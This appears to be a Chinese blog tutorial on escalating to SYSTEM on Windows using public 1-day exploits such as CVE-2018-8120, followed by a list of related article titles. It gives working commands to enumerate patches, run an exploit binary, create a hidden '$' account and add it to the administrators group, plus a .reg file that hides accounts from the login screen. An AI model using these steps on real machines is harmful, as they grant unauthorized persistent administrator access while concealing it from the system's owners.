1.github网址,截图,不同系统版本对应的漏洞

2.后渗透阶段

壹   通过1day漏洞进行Windows本地提权

分享一个github链接:Windows提权漏洞整理

里面大部分是基于x64系统的漏洞直接利用程序exe,傻瓜式操作,一键提权

C:\Users\Knownsec.zyg>
C:\Users\Knownsec.zyg>xxxx.exe "whoami"
C:\Users\Knownsec.zyg>

粘一个大佬分享的截图:

提权前若是能够查看该系统的补丁那是更美妙的事情了:

C:\Users\Knownsec.zyg>systeminfo
C:\Users\Knownsec.zyg>wmic qfe list full /format:htable >C:\Users\Knownsec.zyg\Desktop\hotfixes.htm

这个命令会导出一个html,里面存放了每一个补丁安装的时间,由此可以推测该系统最后一个补丁的时间,查询1day提权漏洞

若是已经发现合适的漏洞并对其进行利用的话,成功效果图如下:

这便是利用CVE-2018-8120的x86版脚本直接提权,“whoami”后返回当前用户显示已经为“system”

贰   后渗透阶段

现在我们已经有了一个基于system超级用户的权限窗口,但是这个窗口功能过于单一,我们可控的权限仍然没有提升,可以通过这个窗口,进行下一步的提权后渗透:

思路:基于system的dos创建隐藏用户,将隐藏用户加入administrators用户组以获得管理员权限

C:\Users\Knownsec.zyg>xxxx.exe "net user"                   #查看当前所有用户
C:\Users\Knownsec.zyg>xxxx.exe "net user 用户名$ 密码 /add"  #添加该用户
C:\Users\Knownsec.zyg>xxxx.exe "net localgroup administrastors username /add"              #将该用户拉入管理员组以获得管理员权限
C:\Users\Knownsec.zyg>xxxx.exe "net user"                   #查看用户发现没有该隐藏用户

或者再:

用记事本建个文本文件,输入以下内容(用户名自行修改),另存为.reg注册表文件后双击导入即可:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"隐藏用户名1"=dword:00000000
"隐藏用户名2"=dword:00000000

二合一食用效果更佳

Windows下的本地提权漏洞梳理及后渗透简析相关推荐

  1. 2019最有意思的五大 ZDI 案例之:通过调色板索引实现 Win32k.sys 本地提权漏洞 (下)...

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 本文是趋势科技 ZDI 项目推出的第二届年度最有意思的五大案例系列文章之一.他们从1000多份安全公告中遴选出这些案例,奇安信代码卫士 ...

  2. Microsoft Windows Win32k本地提权漏洞分析

    漏洞信息 1 漏洞简介 漏洞名称:Microsoft Windows Win32k本地提权漏洞 漏洞编号:CVE-2015-2546 漏洞类型:UAF 影响范围:Windows 7 Service P ...

  3. 【经典漏洞回顾】Microsoft Windows Win32k本地提权漏洞分析(CVE-2015-0057)

    漏洞信息 1 漏洞简介 漏洞名称:Microsoft Windows Win32k本地提权漏洞 漏洞编号:CVE-2015-0057 漏洞类型:UAF 影响范围:Windows Server 2003 ...

  4. 2019最有意思的五大 ZDI 案例之:通过调色板索引实现 Win32k.sys 本地提权漏洞(上)...

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 本文是趋势科技 ZDI 项目推出的第二届年度最有意思的五大案例系列文章之一.他们从1000多份安全公告中遴选出这些案例,奇安信代码卫士 ...

  5. 反编译exe软件_挖洞经验 | Panda反病毒软件本地提权漏洞分析

    写在前面的话 在这篇文章中,我将跟大家讨论一个我在Panda反病毒产品中发现的一个安全漏洞(CVE-2019-12042),这是一个本地提权漏洞,该漏洞将允许攻击者在目标设备上将非特权账户提权至SYS ...

  6. win10注入漏洞跳出计算机,win10操作系统本地提权漏洞

    2018年8月27日,安全研究人员在github上公布了最新的win10x64版的本地提权漏洞,并且在推特上对其提权的demo进行了演示.在github上的SandboxEscaper上有着完整的漏洞 ...

  7. CVE-2014-7911 Android本地提权漏洞分析与利用

    概述 前面我们了解了Android Binder机制的基本原理,当然仅仅了解是不够的,我们要做到:Know it and hack it.这篇文章我们就来分析一个和Binder相关的漏洞:CVE-20 ...

  8. sqlite字段是否存在_【漏洞预警】Linux内核存在本地提权漏洞(CVE20198912)

    更多资讯和分析文章请关注启明星辰ADLab微信公众号及官方网站(adlab.venustech.com.cn) 漏洞背景 近日,Linux git中发布一个commit补丁,该补丁对应的漏洞是一个本地 ...

  9. 开源OS FreeBSD 中 ftpd chroot 本地提权漏洞 (CVE-2020-7468) 的技术分析

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 7月份,一名匿名研究员向 ZDI 报告了 FreeBSD 中的一个本地提权漏洞.它位于 FreeBSD 的文件传输协议守护进程 (ft ...

最新文章

  1. java for循环迭代_JAVA中的for-each循环与迭代
  2. Linux上调整sshd进程的优先级
  3. JZOJ 5691. 【GDOI2018Day2模拟4.25】求和
  4. 交互设计的114条原则
  5. Linux shell 编程(七):流程控制语句
  6. 阿里P8亲自教你!Activity的6大难点,你会几个?年薪50W
  7. 西安后宰门小学_【棒!少年】 追逐热血,挥洒激情!后宰门小学决战2020 MLB First Pitch青少年棒球联赛西安赛区...
  8. Elasticsearch--进阶-filter过滤---全文检索引擎ElasticSearch工作笔记014
  9. 如何删除C++容器中的值
  10. java 元祖_在java中对元组列表进行排序的有效方法
  11. 第二季-专题19-移植tftp客户端
  12. 模仿老乡鸡点餐小程序选择门店功能
  13. 腾讯视频外链获取,可以在微信、所有浏览器播放
  14. html目录链接怎么做,word目录超链接怎么做
  15. 在Ubuntu16.04下配置VSFTPD
  16. 支持Tasker控制的app合集
  17. 企业在实施采购管理时需要注意哪些问题?
  18. 关于结构化、半结构化、非结构化数据的理解
  19. k-9 邮箱添加 qq、163、gmail 帐号
  20. 如何表示Unicode的字符?

热门文章

  1. Mobile2Market 应用程序合格证
  2. 软件设计师-9.数据库技术基础
  3. SVN服务端安装配置
  4. LED产品失效的技术分析指导
  5. JAVA项目-嗖嗖移动
  6. java头像_用java实现给你的头像) +n
  7. java调用SSIS java调用dtsx包 代码+图示
  8. js第一节-js的属性操作
  9. 20220310_CSS学习01、Chrome调试工具
  10. tabulator-tables使用总结(避坑大法)